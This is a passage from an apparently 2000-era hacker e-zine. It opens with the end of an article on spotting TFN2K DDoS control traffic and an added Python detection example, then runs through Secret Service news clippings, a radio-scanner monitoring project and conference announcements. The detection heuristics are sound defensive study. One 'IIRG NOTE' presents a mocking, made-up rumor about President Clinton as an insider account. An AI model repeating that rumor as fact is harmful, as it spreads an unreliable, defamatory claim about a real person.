TFN2K is sending such packets in its control traffic. A TFN2K (and TFN2K
derivatives) specific pattern is a string of repeating A's (AAAA...) in
the payload, since the buffer size is padded by the encryption routine. If
the BASE64 encoding is not used, and the payload contains binary encrypted
traffic, the A's will be trailing binary \0's.

Anomaly 5: Packet payload contains ONLY binary, high-bit characters. While
this can be a binary file transfer (traffic transmitted over ports 20, 21,
80, etc. must be excluded if this rule is applied), especially if contained
in packets that are not part of valid stateful traffic, it is suspicious
of being non-base64 encoded, but encrypted control traffic that is being
transmitted in the packet payload.
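
The general signs listed under Anomalies 0 to 5 can be written as checks that never mention a tool's default port, password or string. The Python below is an added example, not code from the author or from any DDOS tool; the record layouts, the `MIN_PAD_RUN` cut-off, the 16-byte minimum length, the 600-second lookup window and all sample addresses and bytes are assumptions constructed for illustration, while the 10-byte UDP and 128-byte ICMP limits and the excluded ports 20, 21 and 80 are the text's own figures.

```python
import base64
import string
from collections import defaultdict, namedtuple

# Constructed record layouts (assumptions): what a sensor or name-server log
# would supply. in_session = a stateful tracker matched the packet to a flow.
Packet = namedtuple("Packet", "src dst proto dport payload in_session")
Query = namedtuple("Query", "time client qname")

B64_ALPHABET = set((string.ascii_letters + string.digits + "+/").encode())
FILE_TRANSFER_PORTS = {20, 21, 80}  # excluded from Anomaly 5, as in the text
MAX_UDP_PAYLOAD = 10                # bytes; the text's figure, tune per site
MAX_ICMP_PAYLOAD = 128              # bytes; upper figure from the text
MIN_PAD_RUN = 8                     # assumed cut-off for a padding run


def resolver_pattern(queries, victim, attack_start, window=600):
    """Anomaly 0: which clients looked up the victim just before the flood."""
    clients = {q.client for q in queries
               if q.qname == victim
               and attack_start - window <= q.time < attack_start}
    if not clients:
        return "none", clients
    kind = "single-client" if len(clients) == 1 else "many-clients"
    return kind, clients


def flooded_destinations(packets, max_sources):
    """Anomaly 1, source-count form: distinct senders per destination."""
    senders = defaultdict(set)
    for pkt in packets:
        senders[pkt.dst].add(pkt.src)
    return {dst: len(s) for dst, s in senders.items() if len(s) > max_sources}


def trailing_run(data, byte):
    """Length of the run of one byte value at the end of data."""
    return len(data) - len(data.rstrip(bytes([byte])))


def looks_base64(payload):
    """Anomaly 4: nothing but base64 characters plus at most '==' padding."""
    body = payload.rstrip(b"=")
    return (len(body) >= 16 and len(payload) - len(body) <= 2
            and all(b in B64_ALPHABET for b in body))


def only_high_bit(payload):
    """Anomaly 5, read literally: every byte has its top bit set."""
    return len(payload) >= 16 and all(b >= 0x80 for b in payload)


def classify(pkt):
    """Labels, numbered as in section IV, that one packet triggers."""
    found = set()
    limit = {"udp": MAX_UDP_PAYLOAD, "icmp": MAX_ICMP_PAYLOAD}.get(pkt.proto)
    if limit is not None and len(pkt.payload) > limit:
        found.add("2:oversized")
    if pkt.proto in ("tcp", "udp") and not pkt.in_session:
        found.add("3:no-connection")
    if looks_base64(pkt.payload):
        found.add("4:base64-only")
        if trailing_run(pkt.payload.rstrip(b"="), ord("A")) >= MIN_PAD_RUN:
            found.add("4:padding-A")
    elif trailing_run(pkt.payload, 0) >= MIN_PAD_RUN:
        found.add("4:padding-NUL")
    if only_high_bit(pkt.payload) and pkt.dport not in FILE_TRANSFER_PORTS:
        found.add("5:high-bit-only")
    return found


# Constructed sample data: documentation address ranges, made-up bytes.
# Eight opaque bytes plus NUL padding; base64 turns the NULs into A's.
PADDED = bytes.fromhex("9c11e47f03d258b7") + b"\0" * 24
CONTROL_B64 = Packet("198.51.100.7", "192.0.2.20", "udp", 31200,
                     base64.b64encode(PADDED), False)
CONTROL_RAW = CONTROL_B64._replace(payload=PADDED)
HIGH_BIT = Packet("198.51.100.7", "192.0.2.21", "tcp", 40000,
                  bytes(range(0x80, 0xA0)), False)
NORMAL = Packet("192.0.2.5", "192.0.2.53", "udp", 53, b"\x00\x01ping", True)
FLOOD = [Packet("203.0.113.%d" % i, "192.0.2.80", "tcp", 80, b"", False)
         for i in range(1, 51)]
QUERIES = [Query(1000 + i, "203.0.113.%d" % i, "www.victim.example")
           for i in range(1, 6)] + [Query(1200, "198.51.100.9", "other.example")]

if __name__ == "__main__":
    for name in ("CONTROL_B64", "CONTROL_RAW", "HIGH_BIT", "NORMAL"):
        print(name, sorted(classify(globals()[name])))
    print(flooded_destinations(FLOOD + [CONTROL_B64], max_sources=20))
    print(resolver_pattern(QUERIES, "www.victim.example", attack_start=1500))
```

On live traffic the 10-byte UDP limit also flags ordinary services such as DNS, so these labels are inputs for correlation with the other anomalies rather than verdicts on their own.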



 - Mixter

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.1

-----END PGP SIGNATURE-----

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [6]: The Nazi Files (Stories of the SS)
              Compiled By: The IIRG

-------------------------------------------------------------------------------

DISCORD IN THE SECRET SERVICE RANKS?

Black Secret Service Agents To Sue for Discrimination
By Gregory Vistica and Debra Rosenberg
Newsweek, February 22, 2000

On Wednesday, lawyers for 50 African-American Secret Service agents, 
including several who have guarded the First Family, prepared to file a 
class-action suit with the Equal Employment Opportunity Commission in 
Washington. The suit will claim that blacks are discriminated against in the 
agency's promotion process, according to lawyers representing the agents, 
and will also allege that too few blacks hold Secret Service management 
jobs.
The class action is an unusual public airing of complaints by employees of a 
necessarily secretive agency. The complaint will be filed first at the 
Department of Treasury, which oversees the Secret Service, before proceeding 
to the EEOC for review. To further try to correct what they view as a 
pattern of racial bias by their employer, several agents are now working to 
establish a formal association called BASS (Black Agents in the Secret 
Service) that will represent the rights of minorities. One agent involved 
with BASS says that as many as 100 African-American agents have expressed 
interest in joining the group.

On Thursday, Secret Service agents involved in the class action are 
scheduled to hold a press conference with their lawyers at the National 
Press Club. They plan to describe the hurdles they have faced in their 
efforts to be promoted and to discuss the everyday difficulties for blacks 
in an organization that is predominantly white, says their attorney, David 
Shaffer, of Thelen Reid & Priest. Shaffer successfully represented minority 
FBI agents in their 1991 class-action suit against the law-enforcement 
bureau. Shaffer's co-counsel is John Relman and Associates, the law firm 
that represented black Secret Service agents in their lawsuit against 
Denny's restaurants.

Shaffer describes those in charge of the agency's promotion process as 
"good-old boys" who consistently help their white friends win better jobs at 
the expense of qualified African Americans. He says the majority of Secret 
Service agents, black and white, score in the 90th percentile in 
job-performance rankings. Because of this, Shaffer says, personal 
relationships among managers, the majority of whom are white, are the key 
factor in who gets rewarded with a management job. "You have to know the 
higher-ups," Shaffer says, if you want to win a promotion.

There are approximately 2,300 non-uniformed agents who work around the 
world; some 200 of those agents are black, Shaffer says. But African 
Americans hold just 22 management jobs. Agents complain that all but a few 
of the top management jobs in large U.S. cities, including New York, Los 
Angeles and Chicago, are held by white agents. The exceptions, they say, are 
Atlanta and Dallas, cities in which blacks have had senior postings in the 
past.

"Certainly we're concerned," says Jim Mackin, a spokesman for the Secret 
Service. By late Wednesday, he said the agency had not yet received a copy 
of the complaint. Mackin said that the Secret Service has tried to maintain 
a diverse work force and provided some statistics that show black agents 
have indeed held senior posts. Of the seven assistant directors, two are 
African-American, he said. In addition Mackin said black agents head four of 
the eleven largest field offices.

A number of black agents who have worked on President Clinton's security 
detail could join the suit. Among them is Reginald Moore. Shaffer says Moore 
was passed over for the job of director of the Secret Service's operations 
center, though he was serving as its acting director. The man who got the 
job, says Shaffer, was white and was not as qualified as Moore, who was then 
transferred to the Dallas field office. Moore couldn't be reached for 
comment. Then there's Larry Cockell, formerly the lead agent on President 
Clinton's secret service detail, who was forced to testify by Ken Starr, the 
independent prosecutor. Cockell was reportedly in the running to be head of 
the Secret Service, but lost out to another candidate. Through Mackin, 
Cockell says he "is in no way associated with the complaint" and has no 
further comment.

The lawsuit may prove to be something of an embarrassment to the Clinton 
administration, which has made a concerted effort to court blacks for top 
jobs. Unfortunately, perhaps, for his security detail, the president has no 
power over which agents win promotions.

-----------------------------------------------------------------------------
CLINTON EVACUATED FROM HOTEL AFTER FIRE ALARM 

Friday February 25, 3:06 pm Eastern Time
Clinton evacuated from hotel after fire alarm
WASHINGTON, Feb 25 (Reuters) 

U.S. President Bill Clinton was evacuated from a Washington hotel along with
about 800 people attending an awards ceremony on Friday after a fire alarm 
went off.
Clinton joked about the buzzing that began just as he started speaking at the
event in a hotel ballroom. But when three fire officials entered the room, the
Secret Service decided to evacuate the president and others.
The president was escorted outside, got in his limousine and left the hotel in 
his motorcade for the White House. It was not immediately clear if there really 
was a fire.
The fire alarm first started while Secretary of Commerce William Daley was 
speaking but stopped for a few minutes before Clinton started to speak.
The president spoke through the fire alarm for a few minutes, apparently 
expecting the buzz to stop. ``Somebody tell me what the deal is. Is it a fire 
alarm, are we supposed to leave? Not yet...that's not an encouraging answer,'' 
he said to laughter.
``Unless somebody starts singing 'Smoke gets in your eyes' we may just start and 
go on,'' he said. A few moments later he broke away from his speech to say: 
``They're coming to get us. It really is a fire alarm... Thank you.'' 

IIRG NOTE - In a private interview with a hotel staff employee, it was
learned that Secret Service decided to evacuate the president because he 
apparently soiled his pants upon hearing the fire alarm.
He was rushed to the limousine after Secret Service agents grabbed several
hotel bath towels in an attempt to hide the president's "accident".
Our contact claims hotel staff was sworn to secrecy and that several
Secret Service agents returned to the hotel afterwards to retrieve
the bath towels. One agent was heard muttering, "We need those god damned
towels. After Monica's dress we don't need any more physical evidence."

-----------------------------------------------------------------------------
SECRET SERVICE HARASSING BERNIE S AGAIN 
03/17/00 

Five years to the day after Bernie S. was arrested at gunpoint and subjected 
to nearly 17 months of imprisonment by the United States Secret Service, 
agents of the USSS have again begun some kind of cat and mouse game, the 
nature of which has yet to be revealed. 

A Special Agent from the Secret Service showed up unannounced at Bernie's 
workplace and told his employer they wanted to question Bernie, who happened 
to be out sick that day. When Bernie returned to work the following day and 
discovered the Secret Service wanted to talk to him, he surprised the agent 
by calling him. What followed was an extremely strange and circular 
conversation. 

At first the SS agent wouldn't talk to him at all. Then he called Bernie 
back and said they needed to talk with him at his home at 7am the next 
morning. When Bernie explained he was just getting over a serious illness 
and that this was an unreasonable hour, the agent suggested 6am. 
Bernie repeatedly offered to answer their questions at several neutral 
locations, but they said any place other than his home was unacceptable. 
Bernie told them he had nothing to hide, but that he was not comfortable 
having Secret Service agents poking around inside his house and that they 
would have to get a warrant before he'd let them in. The agent then said he 
had to go and would talk to him later. 

About ten minutes later, a second, more polished, SS agent called Bernie and 
continued trying to persuade him to let them inside his home. The agent tried
to goad Bernie by implying he must have something to hide, and that if he 
didn't then there was no reason why they shouldn't be allowed inside his 
home. At this point, Bernie tried to explain by saying if you asked 100 
people on the street if they'd want federal agents in their living room and 
bedroom, almost everyone would say no and that he was no exception. The SS 
agent disagreed, saying people have no legitimate fears about such a visit. 

Bernie repeatedly tried to get the SS agents to tell him what they wanted. 
Finally, the second agent said, "I need to check to see if your telephone 
and Cable TV wiring is hooked up properly." This preposterous claim made 
Bernie actually laugh out loud. But as a further gesture of cooperation, 
Bernie offered to allow Bell Atlantic and Comcast Cable TV technicians to 
inspect his house wiring for them. The SS agents said that, too, would be 
unacceptable. It became clear the SS agents were simply trying anything they 
could to get a foot in his door. Needless to say, after Bernie's previous 
horrendous experience with the Secret Service, their feet are not welcome in 
his home. He then gave them his attorney's name and telephone number and told
them to address future inquiries directly to his lawyer. 

So what is this all about? We don't know yet, but clearly something is up. 
And the way the Secret Service has played sick games with people's lives in 
the past, we felt it would be wise to alert everyone now so we can all keep a
closer eye on them before they try any further outrageous actions under the 
veil of secrecy. 

-------------------------------------------------------------------------------
Friday March 17, 2000; 3:10 PM EST
Hillary's Secret Service Agents Rough Up Reporters as St. Pat's Crowd Boos

Secret Service agents protecting first lady Hillary Clinton 
roughed up several reporters along the route of New York 
City's St. Patrick's Day parade, WABC Radio reported Friday 
afternoon.
To make matters worse, the United States Senate candidate was 
booed at several points along the Fifth Avenue parade route. A 
crowd of holiday revelers gathered at St. Patrick's Cathedral 
shouted "Go back to Arkansas" and "Find your own state."
"Secret Service agents literally are pushing press to the 
ground," reported WABC's Glenn Shuck. "They get back up again. 
Mrs. Clinton stops to shake hands again along the route and 
she's mobbed again by Secret Service." According to Shuck, 
Mrs. Clinton's security got rough with reporters at several 
points along the parade route.
"At one point one (Secret Service agent) grabbed me on my 
right side with his hands, and kind of grabbed my coat to hold 
me back, definitely forcefully," Shuck told afternoon 
drivetime talk show host Sean Hannity.
"The Secret Service just lost their minds, in my opinion," 
said Shuck. "I mean they just started pushing and shoving; 
female camera people five feet tall were getting thrown to the 
ground, cameras flying. Myself, I was grabbed by the shoulder, 
I was thrown back over. I think somebody from Channel 11 
landed on my back. From that point it really didn't get any 
better."
Minutes after Shuck's interview with Hannity, WABC's in-studio 
reporter George Webber announced, "Hillary Clinton's Secret 
Service agents today roughed up several members of the news 
media trying to cover the first lady's visit to the St. 
Patrick's Day parade. At least six reporters, including WABC's 
Glenn Shuck, were pushed and tossed to the ground as they tried 
to get quotes from Mrs. Clinton."
The first lady's reaction:
"I love being a New Yorker. And this is the first time I've 
been able to march in this parade as a New Yorker. I could not 
be happier to be here."
                   
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [7]: IIRG Signal Intelligence (SIGINT) Guidelines
              By: Black IC <black_ic@iirg.org>

- BEGIN PROJECT -


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                   //////    //////     ///////     ////////
                    //        //       //    //    //
                   //        //       ///////     //   ////
                  //        //       //    //    //     //
               ////// *  //////  *  //     // * /////////

               The International Information Retrieval Guild

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

              The International Information Retrieval Guild

                Signal Intelligence (SIGINT) Guidelines

                            Rev. 1-2000-2-A

Part A: Summary

The purpose of this project is to confirm publicly available frequency
lists and update frequency listing and usage on undisclosed frequencies. 

Part B: Requirements

1. Scanner with or as close to the following ranges:

 27 -  54.000 MHz
108 - 136.975 MHz
137 - 174.000 MHz
406 - 512.000 MHz
806 - 823.937 MHz
851 - 868.937 MHz
896 - 956.000 MHz

2. Good antennae with good reception.
3. Working knowledge of "your" scanner.
4. Commitment and patience in terms of monitoring.
5. Commitment and initiative in terms of documenting.
6. We need to know your general area of living. (i.e. North East,
   Mid-West). Though some frequencies are national some are localized and
   this will allow us to cater to your area. Also knowing your scanner's
   make and model will help in giving you frequency lists that you can
   work with.

Part C: Procedures 

You will receive a list of frequencies in order of priority that you will
monitor. These frequencies will have a duration period on how long you
will monitor and possibly what times. When you are done monitoring you
will move to the next frequency. Upon completion of your list please
submit your findings to black_ic@iirg.org

Please find enclosed your documentation procedures and frequency list
catered to your capabilities.  Due to FCC regulations we are not
interested in the content of the traffic other than the parties involved
and at what times they were involved.  Though FCC frequency allocations
are public, the parties they are reserved for change their usage and
sometimes use undisclosed frequencies that are not listed in the public
sector. 

1. Tune in to initial frequency on list.
2. Adjust reception and squelch as needed.
3. Listen to said frequency for instructed time at instructed time.
4. Document any traffic using the following notations:
  
  A. Time (Military Time; GMT, EST, etc.)
  B. Parties Involved (FBI, Media, PD, Pager)
  C. Code & Signals
  D. Duration of Transmission

Part D: Personal SIGINT Frequencies:

<Will be e-mailed>

                                The IIRG'00 
                           May Odin Guide Your Way...


- END PROJECT -

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [8]: The Rumor Mill

-----------------------------------------------------------------------------
  THIS IS THE OFFICIAL ANNOUNCEMENT FOR THE SECOND ANNUAL RUBI CON GROUP
                 DATA AND NETWORK SECURITY CONFERENCE

                                   AKA
 
                              RUBI CON 2000


                       Last updated on 2/23/2000

----------------------------------------------------------------------|
|           ____  __  ______  ____   __________  _   __               |
|          / __ \/ / / / __ )/  _/  / ____/ __ \/ | / /               |
|         / /_/ / / / / __  |/ /   / /   / / / /  |/ /                |
|        /  , _/ /_/ / /_/ // /   / /___/ /_/ / /|  /                 |
|       /_/ |_|\____/_____/___/   \_____\____/_/___/     ___      ___ |
|                                     |_  |    / _ \    / _ \    / _ \|
|************************************/ __/****/ // /***/ // /***/ // /|
|                                   /____/    \___/    \___/    \___/ |
|----------------------------------------------------------------------



-----------------------------------------------------------------------
Who: IT professionals and computer hackers
What: Three days of speakers, classes, games, and more
Where: Romulus, Michigan
Why: To teach, to learn, to understand
When: April 28-30, 2000 (Friday, Saturday, Sunday)
Cost: $100.00, $40.00 for students

Info: http://www.rubi-con.org
-----------------------------------------------------------------------


1. Rubi Con 2000 is a data and network security conference held annually
in metro Detroit. Three days of expert speakers, workshops, games and
contests, all with a casual, open atmosphere and a very unique goal. Our
intention is to bring together the two sides of system security: those on
the outside trying to get in, and those on the inside trying to keep
everyone else out. In the real world, it's IT professionals and security
experts versus "underground" crackers and computer hackers. These two
sides have much more in common than they often realize, and can learn more
from being in each other's presence than they might believe. Rubi Con is
here to bring them into contact with each other.

But we exist to provide information rather than an ideology. For while you
may learn how to break into computers at Rubi Con, you will also learn how
to fortify and defend them. We do not endorse illegal activity, only the
value of information.


2. Rubi Con offers three full days of expert speakers in both large group
and intimate classroom settings. Rubi Con speakers will offer sessions on
such diverse topics as advanced AS/400 security measures and the
philosophy of the modern computer hacker. All sessions are intended to be
highly interactive; questions and dialogue are encouraged to create a more
intimate and friendly atmosphere. Our speakers are professionals and
experts in their fields; many have Ph.D.s and nearly all have been
involved in information technology for decades.

We also offer unique games and contests to test your knowledge. Our
hacking contest is a race to break into secure network servers. Trivia
games offer fun prizes in exchange for obscure information. Do you have a
duck? You will if you play our (in)famous scavenger hunt.


3. Rubi Con occurs yearly in the metro Detroit area. This year we will 
be at the Wyndham Garden Hotel in Romulus, Michigan, right at Detroit 
Metro Airport. The hotel is at 8600 Merriman Road, Romulus, MI 48174, 
United States. You can contact them at (313) 728-7900, or for reservations 
at (877) 999-3223. Wyndham Hotels has a web site here: 
http://www.wyndham.com. Rooms have been reduced to $80.00 per night for 
our group. Mention Rubi Con to receive the discount. The Wyndham requires 
that rooms be rented by credit card only, no cash unless you are over 21. 
See someone here if you are under 21 and are having trouble renting a 
room.


4. Rubi Con 2000 will occur Friday, April 28, Saturday, April 29, and
Sunday, April 30, 2000. The conference will run 24 hours a day, and enough
caffeine will be kept on hand for those who want to run 24 hours a day,
too. Registration begins at 3:00 PM on Friday. We shut our doors late on
Sunday, and all classes will run during the day, between the hours of
11:00 AM and 7:00 PM.


5. Tickets are $100.00, or $40.00 for students. Advanced tickets will cost
$90.00 and $30.00, respectively. See our website for details on ordering
tickets now. Advanced tickets will not be accepted after March 28, or one
month prior to Rubi Con. The cost of a ticket covers all events, classes
and speakers at Rubi Con 2000. You get a professional looking ID badge,
and perhaps other goodies. Swanky RC2K T-shirts sold separately.


-----------------------------------------------------------------------
OTHER INFORMATION:

http://www.rubi-con.org
info@rubi-con.org
tickets@rubi-con.org

The above URL is the official Rubi Con web site. It contains all pertinent
information about this event such as current speaker listings and topics,
event schedules, information on games and contests, advanced ticket sales,
and more. The above email addresses are intended for general information
and ticket questions, respectively. Both are monitored by living,
breathing humans at all times.

-----------------------------------------------------------------------
CALL FOR SUPPORT:

We are always receptive to more speakers and presenters. If you have any
interest in teaching something at the next Rubi Con, contact our
operations director at tantalo@rubi-con.org. We are looking for people
with a background in information technology and with an interest in data
security. If this is you, send us a message.

If you think you or your company may be interested in donating resources
or equipment to Rubi Con 2000, please contact our business director at
deline@rubi-con.org. We are looking for support from companies with
network bandwidth, guest speakers, equipment, advertisement/promotional
materials, and any other contributions. If you or your company wants to
help make Rubi Con 2000 happen, send us a message.
-----------------------------------------------------------------------
READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
 
]]]]]]]]]]]]]]]]]] ]]] ]] ]  ]]   DEF CON 8 Initial Announcement
]]]]]]]^^^^]]]]]]]]]]]]] ]]  ] ]  DEF CON 8 Initial Announcement
]]]]]]^^^^^^]]]]] ]   ]     ]     DEF CON 8 Initial Announcement
]]]]]^^^^^^^^]]]]] ]]   ]         DEF CON 8 Initial Announcement
]]]]^^^^^^^^^^]]] ]  ]]]]]]]] ]   DEF CON 8 Initial Announcement
]]]^^^^^^^^^^^^]]]]]]]]]]  ]      DEF CON 8 Initial Announcement
]]^^^^^^^^^^^^^^]]]]]]   ]]   ]   DEF CON 8 Initial Announcement
]]]^^^^^^^^^^^^]]]]]]]]           DEF CON 8 Initial Announcement
]]]]^^^^^^^^^^]]]]]]]]  ]  ]]     DEF CON 8 Initial Announcement
]]]]]^^^^^^^^]]]]]]] ]]]   ]]  ]  DEF CON 8 Initial Announcement
]]]]]]^^^^^^]]]]]]] ] ]  ]        DEF CON 8 Initial Announcement
]]]]]]]^^^^]]]]]]]]]]] ]] ] ]     DEF CON 8 Initial Announcement
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ]  DEF CON 8 Initial Announcement
 
READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
 
WTF is this?  This is the initial announcement and invitation to DEF CON 00,
a convention for the "underground" elements of the computer culture.  We try
to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies,
Virii coders, programmers, crackers, Cyberpunk Wannabes, Civil Liberties
Groups, CypherPunks, Futurists, etc..
 
WHO:   You know who you are, you shady characters.
WHAT:  A convention for you to meet, party, and listen to some speeches that
       you would normally never hear.
WHEN:  July 28th - 30th, 2000
WHERE: Las Vegas, Nevada @ Alexis Park Resort

What is DEF CON? 

DEF CON is an annual computer underground party for hackers held in Las Vegas,
Nevada, every summer for the past six years.  Over those years it has grown in
size, and attracted people from all over the planet.  Well, no one from 
North Korea has shown up (that we know of) but if they did I'm sure we would 
convince them to tell us elite government secrets.  That's what it is all 
about.  Meeting other spies, er, people and learning something new. 

We are not trying to teach you to learn how to hack in a weekend, but what we
are trying to do is create an environment where you can hang out with people 
from all different backgrounds. All of them interested in the same thing, 
computer security.  To do this we have taken over the complete hotel at the 
Alexis Park Resort.  Does all of this seem interesting?  Then it can be yours 
for the low, low price of only $50 at the door. 

If you want a greater idea of what it is all about, and what other people 
have had to say about the convention please visit the previous year's 
archives sections and read what the media and attendees have had to say. 

There has been an awful lot of press written about DEF CON over the years. 
Some of it good, most of it too fixated on the attendees' green hair.  
If you want to see what people have written, check out the previous years' 
archives for the links.
 
Current Speakers 
----------------

There is currently a call for speakers.
Please email DTangent if you want to exhibit, or sponsor DEF CON 8
------------------------------------------------------------------
Gregory B. White, Ph.D. 
The USAFA Cadet Hacking Case:  
What both sides should learn about computer forensics 

Basically I'll discuss the case that went to trial in the spring of
99.  I was the Deputy Head of the Computer Science Department at the
USAF Academy at the time and was asked by the cadet accused of "hacking"
to help with his defense.  I testified at the trial as an expert witness
for the Defense.  I sat at the Defense table throughout the trial serving
as their "computer expert".  Basically the trial was a comedy of errors
by the prosecution, law enforcement, and the cadet's attorneys alike.
 The cadet was involved in IRC but the law enforcement types and prosecution
became convinced that he was the "hacker" (after all, everybody KNOWS
that IRC is nothing more than a place for hackers to trade information
on how to break into computers -- the actual sentiment expressed by
the investigators).  I had up to that point spent the majority of my
time in the Air Force trying to protect systems and to catch those who
broke into AF systems.  This case really shook me as I saw the LE types
latch onto the smallest of indicators and blow them into a full blown
felony case (the cadet faced 15 years in Leavenworth had he been convicted
of all counts).  What I will cover in the talk is: 

1)  Background of the case
2)  The "evidence" the prosecution thought they had
3)  The many possible areas where clues might have been found had either
    side known where to look (or asked anybody who knew anything about it)
4)  What lessons can be learned from this case.  Those from the government
    and industry need to know where to look if they want to catch folks
    (and if they want to make sure they don't make fools of themselves)
    and those who might find themselves accused someday need to know how
    to help their attorneys find clues that could exonerate them.

Gregory B. White, Ph.D. - Vice President, Professional Services.  Gregory
White joined SecureLogix in March 1999 as the Chief Technology Officer.
 Before joining SecureLogix, he was the Deputy Head of the Computer
Science Department and an Associate Professor of Computer Science at
the United States Air Force Academy in Colorado Springs, Colorado. 
While at the Academy, Dr. White was instrumental in the development
of two courses on computer security and information warfare and in ensuring
that security was taught throughout the computer science curriculum.
 During his two tours at the Academy, he authored a number of papers
on security and information warfare and is a co-author for two textbooks
on computer security. 

Between his Air Force Academy assignments, Dr. White spent three years
at Texas A&M University working on his Ph.D. in computer science.  His
dissertation topic was in the area of host- and network-based intrusion
detection.  Prior to his Academy assignments, Dr. White was a student
at the Air Force's Advanced Communications-Computer Systems Staff Officer
Course in Biloxi, Mississippi.  He was awarded both the AFCEA and Webb
awards for student leadership and academic excellence and was a Distinguished
Graduate of the course.  Before attending the course in Biloxi, Dr.
White served as the Branch Chief of the Network Security Branch at the
Cryptologic Support Center in San Antonio, Texas.  His first assignment
in the Air Force was as a systems analyst at the Strategic Air Command
Headquarters in Omaha, Nebraska.  Dr. White obtained his Ph.D. in Computer
Science from Texas A&M University in 1995.  He received his Masters
in Computer Engineering from the Air Force Institute of Technology in
1986 and his Bachelors in Computer Science from Brigham Young University
in 1980.  He separated from the Air Force in 1999 and is currently serving
in the Air Force Reserves at the Defense Information Systems Agency.
 
Ron Moritz, Chief Technology Officer Finjan Software, Inc. 
Proactive Defense Against Malicious Code 

Anti-virus software is an important part of a well-devised security
policy, but reactive virus detection is not versatile enough for the
demands that will be made on businesses engaged in e-commerce. The year
1999 began with the birth of the Happy 99 virus - a harbinger of things
to come. Happy 99, plus Melissa, PrettyPark and the Explore.zip worm
are all examples of the third generation of malicious replicating code,
designed to exploit the Internet for their rapid proliferation. A variant
of Explore.zip, called MiniZip, managed to hide itself from antiviral
utilities and spread at an amazing rate around the Internet at the end
of 1999. Such programs, which launch new malicious code attacks, create
"first strikes" against systems and networks. Allowing untrusted code
to execute on the corporate network may not be suitable for your organization.
But corporate security policies that block network executables adversely
affect the evolution of the Internet, extranet, and intranet. While
no security implementation is absolute, functionality is not achieved
by disconnecting users from the network and preventing access to programs.
Therefore, proactive defense against first-strike attacks is required
today. 

Almost all web sites today contain mobile code. Many of the powerful
business (ecommerce) applications you need and use are written with
mobile code. Consequently, net-enabled malicious software is likely
to increase in prevalence and successful utilization. The factors accounting
for such a prediction are the ease by which users are duped into double-clicking
on malicious e-mail attachments and the ease by which the sources
of those e-mails are automatically spoofed to seem to come from a boss
or from an e-mail or instant message friend. Traditional pattern matching
approaches are incomplete, out-of-date, and ineffective and were never
designed to prevent a series of new generation attacks based on malicious
mobile code and Trojan executables. 

Ron Moritz is the Chief Technology Officer at Finjan Software where
he serves as primary technology visionary. As a key member of the senior
management team interfacing between sales, marketing, product management,
and product development, Ron helps establish and maintain the company's
technological standards and preserve the company's leadership role as
a developer of advanced Internet security solutions. Ron was instrumental
in the organization of Finjan's Java Security Alliance and established
and chairs Finjan's Technical Advisory Board. He is currently chairing
the Common Content Inspection API industry standards initiative. Ron
is one of a select group of Certified Information Systems Security
Professionals. He earned his M.S.E., M.B.A., and B.A. from Case Western
Reserve University in Cleveland, Ohio.
 
WHERE THIS THING IS:
--------------------
 
It's in Las Vegas, the town that never sleeps.  Really. There are no clocks
anywhere in an attempt to lull you into believing the day never ends.  Talk
about virtual reality, this place fits the bill with no clunky hardware.  If
you have a buzz you may never know the difference.  It will be at the Sahara
Hotel.  Intel as follows:
 
Hotel Location 

The Convention will be held at the Alexis Park Hotel and Resort 
We are taking over the complete hotel!

The Alexis Park Hotel and Resort is across the street from the Hard
Rock Hotel, and is a block off the main strip.   Located at 375 E Harmon
Ave in Las Vegas, NV 89109.  The Alexis Park is a non gambling hotel,
so people 18 years and older can get a room there.  This is the first
time that has ever happened for us!  If there are any problems with
this please email me!  

HOTEL COSTS: Room rates are 85$ for a two bed suite, but you can get
up to four people in one. 

RESERVATIONS: On-line or by phone: 800-453-8000 

We have the whole hotel space, so unless you reference the DEF CON show
the Alexis Park will tell you they are sold out. 

We have all the rooms at the Alexis Park, and a bunch next door at the
San Tropez.  We are working on a block of rooms at the Hard Rock Hotel.
 At last count about 20% of the rooms at the Alexis Park were already
booked.  Sign up early if you want to stay at the main hotel! 

We start Friday, but many people get in Thursday night and hang out
before the fun begins.  We get our convention room rate from Wednesday
night through Monday night for those wanting to stay longer to check
out the attractions. 
 
 
Cheap Airfare Information 

We've got great discounts on airfare from Montrose Travel, who book
bulk air travel for cheap.  If you need to still book tickets give these
guys a call first and compare. 

Montrose Travel  1-800-301-9673 
http://www.montrosetravel.com 
or email Montrose Travel with questions. 

They currently have deals for DEF CON attendees from the US and International
on the following airlines:
 

America West Southwest Delta 
American Southwest Airlines United Airlines 
and other smaller carriers and even International Airfare rates. 

Expect rates lower than published.  When calling make sure you refer
to DEF CON as the group name. 

 
COST:
 
Cost is whatever you pay for a hotel room split however many ways, plus
$50.00 at the door. There are fast food places all over, and there is 
alcohol all over the place, the trick is to get it during a happy hour 
for maximum cheapness.
-----------------------------------------------------------------------------
Hope 2000 is Coming.

 http://www.h2k.net

   July 14th to July 16th, 2000.
          New York City 
-----------------------------------------------------------------------------

Postcards From The Edge BBS

Formerly a Renegade DOS-based dial-up BBS, PFTE is now and has been available
via telnet at luna.iirg.org

PFTE carries an eclectic topic structure surrounding SIGINT, Telephony, RF
Hacking, UNIX, Kit Bashing, and others.  No restrictions on
applying.  Just log in and be a part of an ongoing history surrounding this
board.

The present life of this board is running Citadel.  You can access this
system via telnet or the web.

www.iirg.org/pfte.html

luna.iirg.org

Login: bbs
Password: <enter>

Any questions: black_ic@iirg.org

